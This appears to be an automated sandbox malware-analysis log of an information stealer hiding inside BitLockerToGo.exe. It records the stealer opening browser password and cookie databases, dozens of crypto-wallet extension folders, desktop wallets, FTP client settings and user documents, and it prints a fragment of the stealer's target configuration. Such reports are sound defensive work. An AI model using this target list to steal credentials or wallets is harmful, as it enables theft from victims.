Source: C:\Users\user\Desktop\NjFiIQNSid.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: BitLockerToGo.exe, 00000004.00000002.2860232578.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834331302.0000000003137000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","mf
Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
